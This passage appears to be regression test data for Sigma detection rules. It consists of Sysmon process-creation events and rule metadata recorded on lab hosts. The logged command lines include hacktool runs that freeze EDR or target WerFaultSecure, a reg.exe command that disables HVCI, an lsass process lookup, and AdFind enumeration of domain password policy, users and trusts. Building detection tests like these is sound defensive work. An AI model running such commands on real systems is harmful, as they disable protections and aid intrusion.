date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 4fe074b4-b833-4081-8f24-7dcfeca72b42
title: Security Tools Keyword Lookup Via Findstr.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T17:47:36.346438Z"
}
},
"EventRecordID": 12260122,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-25 17:47:36.344",
"ProcessGuid": "5AA13A44-0D38-68FD-B736-000000004002",
"ProcessId": 7732,
"Image": "C:\\Windows\\System32\\finger.exe",
"FileVersion": "10.0.20348.3451 (WinBuild.160101.0800)",
"Description": "TCPIP Finger Command",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "finger.exe",
"CommandLine": "finger",
"CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000",
"LogonId": "0x529ae3",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=9DFF43AAF3833E42520A4E426F9132ECFC8A1138,MD5=F05FE1D85C1E9B37E27A78DE2A099977,SHA256=9C08862150B290F3834D02F9C2924C3E163B403AC4B00853BCB78B40E00DE6B5,IMPHASH=4EC5391C083809964BB61804E493A505",
"ParentProcessGuid": "5AA13A44-0BDF-68FD-7936-000000004002",
"ParentProcessId": 5232,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "cmd / c \"tasklist | findstr lsass\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_finger_execution/info.yml
================================================
id: 312cf7da-b126-4d53-afc7-01c96aa9710e
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: af491bca-e752-4b44-9c86-df5680533dbc
title: Finger.EXE Execution
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_github_self_hosted_runner/5bac7a56-da88-4c27-922e-c81e113b20cb.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-02T13:40:15.065147Z"
}
},
"EventRecordID": 129581,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3712,
"ThreadID": 5804
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "SUPPORTHUB",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-12-02 13:40:15.062",
"ProcessGuid": "39845534-EC3F-692E-AC01-000000007A00",
"ProcessId": 2252,
"Image": "C:\\Users\\Lab\\Downloads\\actions-runner\\bin\\Runner.Listener.exe",
"FileVersion": "2.329.0.0",
"Description": "Runner.Listener",
"Product": "Runner.Listener",
"Company": "Runner.Listener",
"OriginalFileName": "Runner.Listener.dll",
"CommandLine": "\"C:\\Users\\Lab\\Downloads\\actions-runner\\bin\\Runner.Listener.exe\" configure --url https://github.com/Koifman/shaihulud --token ACJKO5TZBN2V54V7WQEQMMLJF34ZQ",
"CurrentDirectory": "C:\\Users\\Lab\\Downloads\\actions-runner\\",
"User": "SUPPORTHUB\\Lab",
"LogonGuid": "39845534-EA70-692E-18E8-080000000000",
"LogonId": "0x8e818",
"TerminalSessionId": 1,
"IntegrityLevel": "Medium",
"Hashes": "MD5=F2D98E1A81C92345E9FB4C3A8BA80DA9,SHA256=0C90A42A6BE0078726279708539FF3275A40031BCCC6D31FCF77D0A03B6F6BBB,IMPHASH=6A91EB82BFD19D2706C7D43C46F7064E",
"ParentProcessGuid": "39845534-EC3E-692E-AA01-000000007A00",
"ParentProcessId": 9300,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\Lab\\Downloads\\actions-runner\\config.cmd\" --url https://github.com/Koifman/shaihulud --token ACJKO5TZBN2V54V7WQEQMMLJF34ZQ\"",
"ParentUser": "SUPPORTHUB\\Lab"
}
}
}
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-02T13:40:43.642304Z"
}
},
"EventRecordID": 129609,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3712,
"ThreadID": 5804
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "SUPPORTHUB",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-12-02 13:40:43.639",
"ProcessGuid": "39845534-EC5B-692E-B601-000000007A00",
"ProcessId": 6588,
"Image": "C:\\Users\\Lab\\Downloads\\actions-runner\\bin\\Runner.Worker.exe",
"FileVersion": "2.329.0.0",
"Description": "Runner.Worker",
"Product": "Runner.Worker",
"Company": "Runner.Worker",
"OriginalFileName": "Runner.Worker.dll",
"CommandLine": "\"C:\\Users\\Lab\\Downloads\\actions-runner\\bin\\Runner.Worker.exe\" spawnclient 2076 2088",
"CurrentDirectory": "C:\\Users\\Lab\\Downloads\\actions-runner\\bin\\",
"User": "SUPPORTHUB\\Lab",
"LogonGuid": "39845534-EA70-692E-18E8-080000000000",
"LogonId": "0x8e818",
"TerminalSessionId": 1,
"IntegrityLevel": "Medium",
"Hashes": "MD5=B8B5BE3A38732DE389D648044B798146,SHA256=08A676AE543078E5C6163B94E17F9C38D3193A1D59E8BA94ADE43FA0BCA8312C,IMPHASH=6A91EB82BFD19D2706C7D43C46F7064E",
"ParentProcessGuid": "39845534-EC43-692E-AF01-000000007A00",
"ParentProcessId": 7392,
"ParentImage": "C:\\Users\\Lab\\Downloads\\actions-runner\\bin\\Runner.Listener.exe",
"ParentCommandLine": "\"C:\\Users\\Lab\\Downloads\\actions-runner\\\\bin\\Runner.Listener.exe\" run",
"ParentUser": "SUPPORTHUB\\Lab"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_github_self_hosted_runner/info.yml
================================================
id: 94e5ba8c-3bdf-4e12-9300-f7684530d301
description: Includes two process events that will match against the linked SIGMA rule for both conditions
date: 2025-12-02
author: Daniel Koifman (KoifSec)
rule_metadata:
- id: 5bac7a56-da88-4c27-922e-c81e113b20cb
title: Github Self-Hosted Runner Execution
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
path: regression_data/rules/windows/process_creation/proc_creation_win_github_self_hosted_runner/5bac7a56-da88-4c27-922e-c81e113b20cb.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-27T00:09:41.570583Z"
}
},
"EventRecordID": 33638020,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3380,
"ThreadID": 4420
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-27 00:09:41.563",
"ProcessGuid": "5AA13A44-B845-68FE-3702-000000004102",
"ProcessId": 9004,
"Image": "C:\\Windows\\System32\\gpresult.exe",
"FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)",
"Description": "Query Group Policy RSOP Data",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "gprslt.exe",
"CommandLine": "gpresult /z",
"CurrentDirectory": "C:\\Program Files\\DTrace\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-B54F-68FE-E547-0C0000000000",
"LogonId": "0xc47e5",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=84DBEACB152615177EB5EE2AC4735B75186BC28F,MD5=80B679C92D709FF93DF2400966A5C183,SHA256=09F58BF0E2D334AAA7410AB613E71F4D1FD346ABEF010423020BD6C3A6C20195,IMPHASH=C853AD8534AC03E7AD69F32A5B0B1625",
"ParentProcessGuid": "5AA13A44-B6AD-68FE-FC01-000000004102",
"ParentProcessId": 10508,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_gpresult_execution/info.yml
================================================
id: f0e9da0c-c305-4bcb-89e5-79621d0ba6d2
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: e56d3073-83ff-4021-90fe-c658e0709e72
title: Gpresult Display Group Policy Information
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
path: regression_data/rules/windows/process_creation/proc_creation_win_gpresult_execution/e56d3073-83ff-4021-90fe-c658e0709e72.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-27T00:11:22.294854Z"
}
},
"EventRecordID": 33639600,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3380,
"ThreadID": 4420
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-27 00:11:22.292",
"ProcessGuid": "5AA13A44-B8AA-68FE-3F02-000000004102",
"ProcessId": 7784,
"Image": "C:\\Windows\\hh.exe",
"FileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
"Description": "Microsoft® HTML Help Executable",
"Product": "HTML Help",
"Company": "Microsoft Corporation",
"OriginalFileName": "HH.exe",
"CommandLine": "\"C:\\Windows\\hh.exe\" C:\\Windows\\IME\\IMETC\\HELP\\IMTCTC14.CHM",
"CurrentDirectory": "C:\\Windows\\IME\\IMETC\\HELP\\",
"User": "ATTACKRANGE\\Administrator",
"LogonGuid": "5AA13A44-B54F-68FE-E547-0C0000000000",
"LogonId": "0xc47e5",
"TerminalSessionId": 2,
"IntegrityLevel": "High",
"Hashes": "SHA1=641EF54FAECFA4E912DB88075FD25AABDB233A79,MD5=44A6B0A791E00D169EC0FFCFF0A17EB3,SHA256=39811F6070E82E9AA67A4D3E6153A7CD70519DBBAC36067157C573E2F736AA9E,IMPHASH=D3D9C3E81A404E7F5C5302429636F04C",
"ParentProcessGuid": "5AA13A44-B55F-68FE-1A01-000000004102",
"ParentProcessId": 8100,
"ParentImage": "C:\\Program Files\\Everything\\Everything.exe",
"ParentCommandLine": "\"C:\\Program Files\\Everything\\Everything.exe\" -startup",
"ParentUser": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_hh_chm_execution/info.yml
================================================
id: 627bc1e3-7961-4d77-96df-915627f8c3fc
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 68c8acb4-1b60-4890-8e82-3ddf7a6dba84
title: HH.EXE Execution
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
path: regression_data/rules/windows/process_creation/proc_creation_win_hh_chm_execution/68c8acb4-1b60-4890-8e82-3ddf7a6dba84.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_hktl_edr_freeze/c598cc0c-9e70-4852-b9eb-8921af79f598.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-11-27T08:12:45.123135Z"
}
},
"EventRecordID": 733841,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3544,
"ThreadID": 4264
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-11-27 08:12:45.093",
"ProcessGuid": "0197231E-07FD-6928-290C-000000000D00",
"ProcessId": 9388,
"Image": "C:\\Users\\xodih\\Downloads\\EDRFreeze-gnu.exe",
"FileVersion": "-",
"Description": "-",
"Product": "-",
"Company": "-",
"OriginalFileName": "-",
"CommandLine": "EDRFreeze-gnu.exe 3472 10000",
"CurrentDirectory": "C:\\Users\\xodih\\Downloads\\",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-B736-6923-B25C-3B0000000000",
"LogonId": "0x3b5cb2",
"TerminalSessionId": 1,
"IntegrityLevel": "High",
"Hashes": "SHA1=67582B0B646E9E23846A8A9D9E412DCFABC0CCA0,MD5=A3BE334229BEBE056335780502747595,SHA256=0502C36D1F146A6B6BE31F7D7D65FEEF96A3FB3F3743DFFC38BB47AE426849F3,IMPHASH=AB8BB31EDD91D2A05FE7B62A535E9EB7",
"ParentProcessGuid": "0197231E-CC5A-6927-B80A-000000000D00",
"ParentProcessId": 4952,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
"ParentUser": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_hktl_edr_freeze/info.yml
================================================
id: f668b689-59c5-41a7-bc0b-22168d3df14e
description: N/A
date: 2025-11-27
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: c598cc0c-9e70-4852-b9eb-8921af79f598
title: Hacktool - EDR-Freeze Execution
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
path: regression_data/rules/windows/process_creation/proc_creation_win_hktl_edr_freeze/c598cc0c-9e70-4852-b9eb-8921af79f598.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_hktl_wsass/589ac73f-8e12-409c-964e-31a2f5775ae2.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-11-27T07:57:32.087108Z"
}
},
"EventRecordID": 676334,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3544,
"ThreadID": 4264
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-11-27 07:57:32.080",
"ProcessGuid": "0197231E-046C-6928-150C-000000000D00",
"ProcessId": 7088,
"Image": "C:\\Users\\Public\\wsass\\WSASS.exe",
"FileVersion": "-",
"Description": "-",
"Product": "-",
"Company": "-",
"OriginalFileName": "-",
"CommandLine": "WSASS.exe WerFaultSecure.exe 860",
"CurrentDirectory": "C:\\Users\\Public\\wsass\\",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-B736-6923-B25C-3B0000000000",
"LogonId": "0x3b5cb2",
"TerminalSessionId": 1,
"IntegrityLevel": "High",
"Hashes": "SHA1=63AF15DCCB5CA8704918B7A8BFD0308726B2D7FD,MD5=D7A969E5A3636BF8FC9CA8A72021BFDC,SHA256=0977C9337EC1215C48A666464AFDA5C9A30CD24999A5F8E821E672991864A74C,IMPHASH=32F5095C9BBDCACF28FD4060EB4DFC42",
"ParentProcessGuid": "0197231E-0250-6928-D30B-000000000D00",
"ParentProcessId": 11640,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
"ParentUser": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_hktl_wsass/info.yml
================================================
id: e3ffac4e-8507-43f9-9542-4c9f10f49d3a
description: N/A
date: 2025-11-27
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 589ac73f-8e12-409c-964e-31a2f5775ae2
title: HackTool - WSASS Execution
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
path: regression_data/rules/windows/process_creation/proc_creation_win_hktl_wsass/589ac73f-8e12-409c-964e-31a2f5775ae2.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_hvci_registry_tampering/6225c53a-a96e-4235-b28f-8d7997cd96eb.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-23T02:25:20.222853Z"
}
},
"EventRecordID": 90965,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3320,
"ThreadID": 4216
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-12-23 02:25:20.191",
"ProcessGuid": "0197231E-FD90-6949-5110-000000000D00",
"ProcessId": 10104,
"Image": "C:\\Windows\\System32\\reg.exe",
"FileVersion": "10.0.26100.5074 (WinBuild.160101.0800)",
"Description": "Registry Console Tool",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "reg.exe",
"CommandLine": "reg.exe add \"HKLM\\System\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\" /v \"Enabled\" /t REG_DWORD /d 0 /f",
"CurrentDirectory": "C:\\Users\\xodih\\Downloads\\Sysmon\\",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-5032-6940-AAE2-070000000000",
"LogonId": "0x7e2aa",
"TerminalSessionId": 1,
"IntegrityLevel": "High",
"Hashes": "MD5=CE3B3DCB08556285C0FC73B7CDC1601D,SHA256=08B28258C2225574FE6359286B5D23B19F07BD39CEE04B72ED5CF7A8B7FBF9F3,IMPHASH=8E5CDA80916A6EB4EC8151EC790ED9F0",
"ParentProcessGuid": "0197231E-FB8C-6949-2310-000000000D00",
"ParentProcessId": 22176,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
"ParentUser": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_hvci_registry_tampering/info.yml
================================================
id: 7c72394d-cb39-4d53-836a-ebc524ee1685
description: N/A
date: 2025-12-23
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 6225c53a-a96e-4235-b28f-8d7997cd96eb
title: Hypervisor-protected Code Integrity (HVCI) Related Registry Tampering Via CommandLine
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_hvci_registry_tampering/6225c53a-a96e-4235-b28f-8d7997cd96eb.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-23T09:37:40.974119Z"
}
},
"EventRecordID": 650014,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3076,
"ThreadID": 4936
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "srv-01.midgardnet.tech",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-23 09:37:40.972",
"ProcessGuid": "14207D89-F764-68F9-2410-000000003F02",
"ProcessId": 4316,
"Image": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\AdFind.exe",
"FileVersion": "1.62.0.6172",
"Description": "-",
"Product": "AdFind",
"Company": "www.joeware.net",
"OriginalFileName": "AdFind.exe",
"CommandLine": "AdFind.exe -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties",
"CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\",
"User": "MIDGARDNET\\SwachchhandaP",
"LogonGuid": "14207D89-91E6-68F9-0F94-460000000000",
"LogonId": "0x46940f",
"TerminalSessionId": 2,
"IntegrityLevel": "Medium",
"Hashes": "MD5=B0C4A9C1D8C4641A161B3DBF111454DF,SHA256=484DD00E85C033FBFD506B956AC0ACD29B30F239755ED753A2788A842425B384,IMPHASH=680DAD9E300346E05A85023965867201",
"ParentProcessGuid": "14207D89-F57C-68F9-D70F-000000003F02",
"ParentProcessId": 6488,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "MIDGARDNET\\SwachchhandaP"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration/info.yml
================================================
id: de5c7702-3eb3-41be-ae33-b36a6f13d985
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 455b9d50-15a1-4b99-853f-8d37655a4c1b
title: PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration/455b9d50-15a1-4b99-853f-8d37655a4c1b.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-23T09:30:03.278177Z"
}
},
"EventRecordID": 649847,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3076,
"ThreadID": 4936
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "srv-01.midgardnet.tech",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-23 09:30:03.253",
"ProcessGuid": "14207D89-F59B-68F9-DB0F-000000003F02",
"ProcessId": 6504,
"Image": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\AdFind.exe",
"FileVersion": "1.62.0.6172",
"Description": "-",
"Product": "AdFind",
"Company": "www.joeware.net",
"OriginalFileName": "AdFind.exe",
"CommandLine": "AdFind.exe -f (objectcategory=person)",
"CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\",
"User": "MIDGARDNET\\SwachchhandaP",
"LogonGuid": "14207D89-91E6-68F9-0F94-460000000000",
"LogonId": "0x46940f",
"TerminalSessionId": 2,
"IntegrityLevel": "Medium",
"Hashes": "MD5=B0C4A9C1D8C4641A161B3DBF111454DF,SHA256=484DD00E85C033FBFD506B956AC0ACD29B30F239755ED753A2788A842425B384,IMPHASH=680DAD9E300346E05A85023965867201",
"ParentProcessGuid": "14207D89-F57C-68F9-D70F-000000003F02",
"ParentProcessId": 6488,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
"ParentUser": "MIDGARDNET\\SwachchhandaP"
}
}
}
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_execution/info.yml
================================================
id: c02bbff9-3d3b-4b4b-a6f5-8c2f4cbb60ad
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 514e7e3e-b3b4-4a67-af60-be20f139198b
title: PUA - AdFind.EXE Execution
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_execution/514e7e3e-b3b4-4a67-af60-be20f139198b.evtx
================================================
FILE: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/9a132afa-654e-11eb-ae93-0242ac130002.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-23T11:32:08.872401Z"
}
},
"EventRecordID": 651803,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3076,
"ThreadID": 4936
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "srv-01.midgardnet.tech",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-10-23 11:32:08.871",
"ProcessGuid": "14207D89-1238-68FA-4A13-000000003F02",
"ProcessId": 8080,
"Image": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\AdFind.exe",
"FileVersion": "1.62.0.6172",
"Description": "-",
"Product": "AdFind",
"Company": "www.joeware.net",
"OriginalFileName": "AdFind.exe",
"CommandLine": "AdFind.exe -s trustdmp",
"CurrentDirectory": "C:\\Users\\SwachchhandaP\\Downloads\\AdFind\\",
"User": "MIDGARDNET\\SwachchhandaP",
"LogonGuid": "14207D89-91E6-68F9-0F94-460000000000",
"LogonId": "0x46940f",
"TerminalSessionId": 2,
"IntegrityLevel": "Medium",
